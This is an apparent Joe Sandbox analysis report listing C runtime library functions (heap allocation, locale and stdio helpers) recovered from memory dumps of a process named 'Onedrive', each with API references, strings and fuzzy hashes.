Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd

Similarity

API ID: String__crt$Info
String ID: $z
API String ID: 2508956065-2251613814
Opcode ID: a1bb79b3926ab07b511d83ff6639c85910dc0fd292b6cb2822028fa61ec3b579
Instruction ID: 1c3e6a7de18d1f92e0b02d1ef2626bc68de4b1082480090e8637a8f3905471cf
Opcode Fuzzy Hash: a1bb79b3926ab07b511d83ff6639c85910dc0fd292b6cb2822028fa61ec3b579
Instruction Fuzzy Hash: 65B12B3260DAC19BD764CB58E08036EFBA1F7D9794F044526EACA83B98CBACD444CF40

Function 00007FF8A0330B9C Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 171COMMON

Download Yara Rule

APIs

__free_lconv_mon.LIBCMTD ref: 00007FF8A0330C1F
__free_lconv_num.LIBCMTD ref: 00007FF8A0330C66

Strings

(ptloci->lc_category[category].locale != nullptr && ptloci->lc_category[category].refcount != nullptr) || (ptloci->lc_category[cat, xrefs: 00007FF8A0330E3F
%ls, xrefs: 00007FF8A0330E4B
minkernel\crts\ucrt\src\appcrt\locale\locale_refcounting.cpp, xrefs: 00007FF8A0330E60

Memory Dump Source

Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true

Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd

Similarity

API ID: __free_lconv_mon__free_lconv_num
String ID: %ls$(ptloci->lc_category[category].locale != nullptr && ptloci->lc_category[category].refcount != nullptr) || (ptloci->lc_category[cat$minkernel\crts\ucrt\src\appcrt\locale\locale_refcounting.cpp
API String ID: 2148069796-164516335
Opcode ID: f8c993c3ac616c137a0244c55a8ab641f86d32dc4a5abb803c8119df114f18a7
Instruction ID: 99b3a1a52950367e8402b64a56647d09ac867552cc372ee974b4b92b201ac5b8
Opcode Fuzzy Hash: f8c993c3ac616c137a0244c55a8ab641f86d32dc4a5abb803c8119df114f18a7
Instruction Fuzzy Hash: 5A915D22619E8692EF50CB45E0D137AA7A0FBC4BC1F055536EA8E4BBA5CFBCD485C700

Function 00007FF8A03067D0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 171COMMONLIBRARYCODE

Download Yara Rule

Strings

MOC, xrefs: 00007FF8A0306848
RCC, xrefs: 00007FF8A0306858

Memory Dump Source

Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true

Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd

Similarity

API ID:
String ID: MOC$RCC
API String ID: 0-2084237596
Opcode ID: 59c54c8cb16b957d9b1ed07fc171562f92a7a927a343df4c3b5bb3759d843deb
Instruction ID: 849ecbc99d0981064dfc61a2ffa403c30d750fbf4349b6b411521a7188f6dcbc
Opcode Fuzzy Hash: 59c54c8cb16b957d9b1ed07fc171562f92a7a927a343df4c3b5bb3759d843deb
Instruction Fuzzy Hash: 9B91CA72A0ABC6A5E6709F56E4403EAB7A0FB88784F504036EA8D47B99DF7CD544CB00

Function 00007FF6104FA9EC Relevance: 8.9, APIs: 7, Instructions: 160memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,?,00000000,00007FF6104FDACF,?,?,?,00000000,?,?,?,00007FF6104FC83D), ref: 00007FF6104FAB27
HeapAlloc.KERNEL32(?,?,?,00000000,?,?,?,00007FF6104FC83D), ref: 00007FF6104FAB3B
memmove.MSVCRT(?,?,?,00000000,?,?,?,00007FF6104FC83D), ref: 00007FF6104FAB6F
GetProcessHeap.KERNEL32(?,?,?,00000000,?,?,?,00007FF6104FC83D), ref: 00007FF6104FAB8E
HeapFree.KERNEL32(?,?,?,00000000,?,?,?,00007FF6104FC83D), ref: 00007FF6104FABA2
GetProcessHeap.KERNEL32(00000000,?,00000000,00007FF6104FDACF,?,?,?,00000000,?,?,?,00007FF6104FC83D), ref: 00007FF6104FABCB
HeapFree.KERNEL32(?,?,?,00000000,?,?,?,00007FF6104FC83D), ref: 00007FF6104FABDF

Memory Dump Source

Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true

Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd

Similarity

API ID: Heap$Process$Free$Allocmemmove
String ID:
API String ID: 3442027419-0
Opcode ID: dad896d2d793cc911e38404661b56dba7b395c6b74f73abf0410838d05515740
Instruction ID: c4a6342c12fbf4dd269b6b588d68e3852a900ece26b24cbda1fc14fd9afe25ee
Opcode Fuzzy Hash: dad896d2d793cc911e38404661b56dba7b395c6b74f73abf0410838d05515740
Instruction Fuzzy Hash: 8251EA72A08A46E6EE18AF29948407D7696FF89FA0F098438DA4FD3351DE3DF465C305

Function 00007FF6104F949C Relevance: 8.9, APIs: 7, Instructions: 122memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,00000000,00007FF6104F82C6), ref: 00007FF6104F9524
HeapAlloc.KERNEL32(?,?,00000000,00007FF6104F82C6), ref: 00007FF6104F9538
memmove.MSVCRT(?,?,00000000,00007FF6104F82C6), ref: 00007FF6104F9566
GetProcessHeap.KERNEL32(?,?,00000000,00007FF6104F82C6), ref: 00007FF6104F95B9
HeapFree.KERNEL32(?,?,00000000,00007FF6104F82C6), ref: 00007FF6104F95CD
GetProcessHeap.KERNEL32(?,?,00000000,00007FF6104F82C6), ref: 00007FF6104F95FA
HeapFree.KERNEL32(?,?,00000000,00007FF6104F82C6), ref: 00007FF6104F960E

Memory Dump Source

Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true

Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd

Similarity

API ID: Heap$Process$Free$Allocmemmove
String ID:
API String ID: 3442027419-0
Opcode ID: d52f1c5daf9b55119971937f55c72f90c6fe77c5cc7fbe569b2c6201aa31f2e0
Instruction ID: d4a20c382034e54aa6c5cc2cd0b2d5a3897a43ac71fc9819a71232add545c5b2
Opcode Fuzzy Hash: d52f1c5daf9b55119971937f55c72f90c6fe77c5cc7fbe569b2c6201aa31f2e0
Instruction Fuzzy Hash: F341B226A08F42E7EE159F5AA480139BAA5BF88FE0F099034DE4E87754DF3CE8518300

Function 00007FF8A0329135 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

new[].LIBCMTD ref: 00007FF8A032916F
Concurrency::details::_Scheduler::_Scheduler.LIBCMTD ref: 00007FF8A032917C

Strings

minkernel\crts\ucrt\src\appcrt\mbstring\mbctype.cpp, xrefs: 00007FF8A032915E

Memory Dump Source

Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true

Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd

Similarity

API ID: Concurrency::details::_SchedulerScheduler::_new[]
String ID: minkernel\crts\ucrt\src\appcrt\mbstring\mbctype.cpp
API String ID: 3742145013-426720447
Opcode ID: 60669bbcb90472b39e6566556282e0c1fef63ff969ffe470ccdd1451293b4045
Instruction ID: d156badd09899be1e8eb40dc8ddf6894d6fa5330d9e74821a8643168e55897aa
Opcode Fuzzy Hash: 60669bbcb90472b39e6566556282e0c1fef63ff969ffe470ccdd1451293b4045
Instruction Fuzzy Hash: 4B51323261EA83A6E760DB15E4542BE73A0FBD8794F504132E69D87BE6DF2CD504CB40

Function 00007FF6104FDD74 Relevance: 8.9, APIs: 7, Instructions: 113memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,00000000,00007FF6104FC831), ref: 00007FF6104FDDF6
HeapAlloc.KERNEL32(?,?,00000000,00007FF6104FC831), ref: 00007FF6104FDE0A
memmove.MSVCRT(?,?,00000000,00007FF6104FC831), ref: 00007FF6104FDE38
GetProcessHeap.KERNEL32(?,?,00000000,00007FF6104FC831), ref: 00007FF6104FDE71
HeapFree.KERNEL32(?,?,00000000,00007FF6104FC831), ref: 00007FF6104FDE85
GetProcessHeap.KERNEL32(?,?,00000000,00007FF6104FC831), ref: 00007FF6104FDEB2
HeapFree.KERNEL32(?,?,00000000,00007FF6104FC831), ref: 00007FF6104FDEC6

Memory Dump Source

Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true

Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd

Similarity

API ID: Heap$Process$Free$Allocmemmove
String ID:
API String ID: 3442027419-0
Opcode ID: dd59d9a7f5ff281a3a5ac38261a22c1cfc43348459e99cafb0c1c9f369091ba9
Instruction ID: 23b387208a354d26a1071c1455c61e592570cdd2dca9d7370402c330941336ac
Opcode Fuzzy Hash: dd59d9a7f5ff281a3a5ac38261a22c1cfc43348459e99cafb0c1c9f369091ba9
Instruction Fuzzy Hash: FE41B422A08F82D7EE14AF5A658017DB6A6BF99FE1B09C034DE6E87755DF3CE4518300

Function 00007FF6104F62F0 Relevance: 8.9, APIs: 7, Instructions: 102memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,0000200000000000,00007FF6104F65C4,?,?,?,?,?,?,?,?,?,00007FF6104F7F0D), ref: 00007FF6104F6377
HeapAlloc.KERNEL32(?,?,0000200000000000,00007FF6104F65C4,?,?,?,?,?,?,?,?,?,00007FF6104F7F0D), ref: 00007FF6104F638B
memmove.MSVCRT(?,?,0000200000000000,00007FF6104F65C4,?,?,?,?,?,?,?,?,?,00007FF6104F7F0D), ref: 00007FF6104F63BC
GetProcessHeap.KERNEL32(?,?,0000200000000000,00007FF6104F65C4,?,?,?,?,?,?,?,?,?,00007FF6104F7F0D), ref: 00007FF6104F63D2
HeapFree.KERNEL32(?,?,0000200000000000,00007FF6104F65C4,?,?,?,?,?,?,?,?,?,00007FF6104F7F0D), ref: 00007FF6104F63E6
GetProcessHeap.KERNEL32(?,?,0000200000000000,00007FF6104F65C4,?,?,?,?,?,?,?,?,?,00007FF6104F7F0D), ref: 00007FF6104F6414
HeapFree.KERNEL32(?,?,0000200000000000,00007FF6104F65C4,?,?,?,?,?,?,?,?,?,00007FF6104F7F0D), ref: 00007FF6104F6428

Memory Dump Source

Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true

Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd

Similarity

API ID: Heap$Process$Free$Allocmemmove
String ID:
API String ID: 3442027419-0
Opcode ID: e3ea0ae9526573e326e153ee29c05e8328531308f38c4549085912ce3cfad05f
Instruction ID: 2d627c07943702ae0e9281b0c20d04d204f2f51dedee0dd6a3d8b007ee552f53
Opcode Fuzzy Hash: e3ea0ae9526573e326e153ee29c05e8328531308f38c4549085912ce3cfad05f
Instruction Fuzzy Hash: 76318222A08F52D7EE14AB6AA54547DBAA6FF89FE1B0A8034DE0D83355DF3CE4558301

Function 00007FF6104F9640 Relevance: 8.9, APIs: 7, Instructions: 101memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,00000000,00000000,00007FF6104FD591,?,00000000,00000000,00007FF6104FD1A7,?,?,00000000), ref: 00007FF6104F96BF
HeapAlloc.KERNEL32(?,00000000,00000000,00007FF6104FD591,?,00000000,00000000,00007FF6104FD1A7,?,?,00000000), ref: 00007FF6104F96D3
memmove.MSVCRT(?,00000000,00000000,00007FF6104FD591,?,00000000,00000000,00007FF6104FD1A7,?,?,00000000), ref: 00007FF6104F9700
GetProcessHeap.KERNEL32(?,00000000,00000000,00007FF6104FD591,?,00000000,00000000,00007FF6104FD1A7,?,?,00000000), ref: 00007FF6104F9716
HeapFree.KERNEL32(?,00000000,00000000,00007FF6104FD591,?,00000000,00000000,00007FF6104FD1A7,?,?,00000000), ref: 00007FF6104F972A
GetProcessHeap.KERNEL32(?,00000000,00000000,00007FF6104FD591,?,00000000,00000000,00007FF6104FD1A7,?,?,00000000), ref: 00007FF6104F9758
HeapFree.KERNEL32(?,00000000,00000000,00007FF6104FD591,?,00000000,00000000,00007FF6104FD1A7,?,?,00000000), ref: 00007FF6104F976C

Memory Dump Source

Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true

Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd

Similarity

API ID: Heap$Process$Free$Allocmemmove
String ID:
API String ID: 3442027419-0
Opcode ID: c9fe35422332f408aca34dfc3986990ec640009ac1058576df87ad1f4ad7d076
Instruction ID: d14bf3bbc33fa007d92a9ec7d8c89608e9f39ff3e885c37a5a0162823bd643bc
Opcode Fuzzy Hash: c9fe35422332f408aca34dfc3986990ec640009ac1058576df87ad1f4ad7d076
Instruction Fuzzy Hash: 07319226A09F42D6EE15AF9A654407ABAD5BF89FE1B0A8034DE0DC3355DF3CE8118301

Function 00007FF6104F22BC Relevance: 8.9, APIs: 7, Instructions: 101memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,?,00007FF6104F1D5E), ref: 00007FF6104F233B
HeapAlloc.KERNEL32(?,?,?,00007FF6104F1D5E), ref: 00007FF6104F234F
memmove.MSVCRT(?,?,?,00007FF6104F1D5E), ref: 00007FF6104F237C
GetProcessHeap.KERNEL32(?,?,?,00007FF6104F1D5E), ref: 00007FF6104F2392
HeapFree.KERNEL32(?,?,?,00007FF6104F1D5E), ref: 00007FF6104F23A6
GetProcessHeap.KERNEL32(?,?,?,00007FF6104F1D5E), ref: 00007FF6104F23D4
HeapFree.KERNEL32(?,?,?,00007FF6104F1D5E), ref: 00007FF6104F23E8

Memory Dump Source

Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true

Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd

Similarity

API ID: Heap$Process$Free$Allocmemmove
String ID:
API String ID: 3442027419-0
Opcode ID: e712f9ac12633a78c19ab5ec0b286bbeba9ad5bbc8c49b7ef324b6a63908fe2e
Instruction ID: 0851e681b9fe595c57a2614f3837ce351bcf349c443029465e8771dc642df9e1
Opcode Fuzzy Hash: e712f9ac12633a78c19ab5ec0b286bbeba9ad5bbc8c49b7ef324b6a63908fe2e
Instruction Fuzzy Hash: 29318362A08F52D7EE15AFAA664007DBA95FF89FE1B0A8034DE0D87355DF3CE4518300

Function 00007FF8A03166A0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 95COMMON

Download Yara Rule

APIs

Concurrency::details::_Scheduler::_Scheduler.LIBCMTD ref: 00007FF8A03166B3

Part of subcall function 00007FF8A03253C0: Concurrency::details::_Scheduler::_Scheduler.LIBCMTD ref: 00007FF8A03253D3
Part of subcall function 00007FF8A03253C0: __crt_scoped_stack_ptr.LIBCPMTD ref: 00007FF8A03253DD

Strings

%ls, xrefs: 00007FF8A03167B9
minkernel\crts\ucrt\inc\corecrt_internal_stdio.h, xrefs: 00007FF8A03167CE, 00007FF8A0316808
( (_Stream.is_string_backed()) || (fn = _fileno(_Stream.public_stream()), ((_textmode_safe(fn) == __crt_lowio_text_mode::ansi) && , xrefs: 00007FF8A03167AD, 00007FF8A0316816
__acrt_stdio_char_traits<char>::validate_stream_is_ansi_if_required, xrefs: 00007FF8A031680F

Memory Dump Source

Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true

Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd

Similarity

API ID: Concurrency::details::_SchedulerScheduler::_$__crt_scoped_stack_ptr
String ID: %ls$( (_Stream.is_string_backed()) || (fn = _fileno(_Stream.public_stream()), ((_textmode_safe(fn) == __crt_lowio_text_mode::ansi) && $__acrt_stdio_char_traits<char>::validate_stream_is_ansi_if_required$minkernel\crts\ucrt\inc\corecrt_internal_stdio.h
API String ID: 4164245112-3476576762
Opcode ID: 595d77306e7c1ba2192bce2374f2339c1ebf0ddb5053516ebe0f578c2be52e6d
Instruction ID: 232428a9d98034dbbb70c7039b9240a6979434382e254fffe1b5a4e96c9c482d
Opcode Fuzzy Hash: 595d77306e7c1ba2192bce2374f2339c1ebf0ddb5053516ebe0f578c2be52e6d
Instruction Fuzzy Hash: C3418172A2EE43A6EA508B55E480279B3A5FB883D6F501135E68E477E8DF3CE515CB00

Function 00007FF8A0305160 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 82COMMONLIBRARYCODE

Download Yara Rule

Strings

%ls, xrefs: 00007FF8A030521A, 00007FF8A030528D
cached_fp == new_fp, xrefs: 00007FF8A0305281
cached_fp == invalid_function_sentinel(), xrefs: 00007FF8A030520E
D:\a\_work\1\s\src\vctools\crt\vcruntime\src\internal\winapi_downlevel.cpp, xrefs: 00007FF8A030522F, 00007FF8A03052A2

Memory Dump Source

Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true

Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd

Similarity

API ID:
String ID: %ls$D:\a\_work\1\s\src\vctools\crt\vcruntime\src\internal\winapi_downlevel.cpp$cached_fp == invalid_function_sentinel()$cached_fp == new_fp
API String ID: 0-3288861829
Opcode ID: 81221ba029a3a9ed0e07fe46d51d06ec6f17ef045b154b741772c52cdf746db2
Instruction ID: e9be0ee6fa60a8ba5d5da6f4e301855587a4c16404e2e954019243d9564a1be6
Opcode Fuzzy Hash: 81221ba029a3a9ed0e07fe46d51d06ec6f17ef045b154b741772c52cdf746db2
Instruction Fuzzy Hash: 1A412C32A1BF43A1EA50DB94E08476A67B8FB853C4FA01535E68D47BA9DF3DE1508B00

Function 00007FF8A03052D0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 80COMMONLIBRARYCODE

Download Yara Rule

Strings

%ls, xrefs: 00007FF8A0305375, 00007FF8A03053EB
cached_handle == INVALID_HANDLE_VALUE, xrefs: 00007FF8A0305369
cached_handle == new_handle, xrefs: 00007FF8A03053DF
D:\a\_work\1\s\src\vctools\crt\vcruntime\src\internal\winapi_downlevel.cpp, xrefs: 00007FF8A030538A, 00007FF8A0305400

Memory Dump Source

Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true

Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd

Similarity

API ID:
String ID: %ls$D:\a\_work\1\s\src\vctools\crt\vcruntime\src\internal\winapi_downlevel.cpp$cached_handle == INVALID_HANDLE_VALUE$cached_handle == new_handle
API String ID: 0-3058771551
Opcode ID: 8169267e5ef227a535ec2129772ca57c7f70ec23d8b582db34dd299050f66a4c
Instruction ID: 1cda79b96ff42f6234ac670dd5def1ec7db9a8c4366cb0a8666da64d547cadad
Opcode Fuzzy Hash: 8169267e5ef227a535ec2129772ca57c7f70ec23d8b582db34dd299050f66a4c
Instruction Fuzzy Hash: 38415B35A2BE47A2EA10CF55E08436A63B4FB843E4F601635E6AE477E4DF3DE1818700

Function 00007FF8A031BBD0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 70COMMON

Download Yara Rule

APIs

swprintf.LIBCMTD ref: 00007FF8A031BCCD

Strings

%.2X , xrefs: 00007FF8A031BCBB
(*_errno()), xrefs: 00007FF8A031BD04
print_block_data, xrefs: 00007FF8A031BCF8
minkernel\crts\ucrt\src\appcrt\heap\debug_heap.cpp, xrefs: 00007FF8A031BCEC

Memory Dump Source

Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true

Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd

Similarity

API ID: swprintf
String ID: %.2X $(*_errno())$minkernel\crts\ucrt\src\appcrt\heap\debug_heap.cpp$print_block_data
API String ID: 233258989-3778139020
Opcode ID: f612877d82cba73926e19678f2406ce31d19ebf721c80f3c0f04ba7989c069f5
Instruction ID: dbfd1ac4c3212d1037fcc4a54a9880f1c4147954d4f42539ea22981c83293d24
Opcode Fuzzy Hash: f612877d82cba73926e19678f2406ce31d19ebf721c80f3c0f04ba7989c069f5
Instruction Fuzzy Hash: CE311C7260EA8295DB109B55E4902BEBBA0EBC97C1F504036EBCD47BAADF7DD444CB40

Function 00007FF8A032DD40 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 55COMMON

Download Yara Rule

APIs

FlushFileBuffers.KERNEL32 ref: 00007FF8A032DD95
GetLastError.KERNEL32 ref: 00007FF8A032DDA3

Strings

%ls, xrefs: 00007FF8A032DDD5
minkernel\crts\ucrt\src\appcrt\lowio\commit.cpp, xrefs: 00007FF8A032DDEA
("Invalid file descriptor. File possibly closed by a different thread",0), xrefs: 00007FF8A032DDC9

Memory Dump Source

Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true

Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd

Similarity

API ID: BuffersErrorFileFlushLast
String ID: %ls$("Invalid file descriptor. File possibly closed by a different thread",0)$minkernel\crts\ucrt\src\appcrt\lowio\commit.cpp
API String ID: 1917127615-1268643607
Opcode ID: d635cbc310806dabc9f5e613dd8a320b68fb236f3b94d93def20512e2d93046d
Instruction ID: afd585f87b35b61543dd752bb35e44aa5a742c6d1a963e72500c2a281793f08a
Opcode Fuzzy Hash: d635cbc310806dabc9f5e613dd8a320b68fb236f3b94d93def20512e2d93046d
Instruction Fuzzy Hash: 47216076B1AF079AEB509F65E49012A73A5FB98BC1F448531EA4D8B3A4DF3CD410CB40

Function 00007FF8A0316200 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 54COMMON

Download Yara Rule

APIs

__crt_scoped_stack_ptr.LIBCPMTD ref: 00007FF8A0316216

Part of subcall function 00007FF8A03166A0: Concurrency::details::_Scheduler::_Scheduler.LIBCMTD ref: 00007FF8A03166B3

Strings

_stream.valid(), xrefs: 00007FF8A0316243, 00007FF8A03162C9
%ls, xrefs: 00007FF8A031624F
__crt_stdio_output::stream_output_adapter<char>::validate, xrefs: 00007FF8A03162C2
minkernel\crts\ucrt\inc\corecrt_internal_stdio_output.h, xrefs: 00007FF8A0316264, 00007FF8A03162BB

Memory Dump Source

Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true

Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
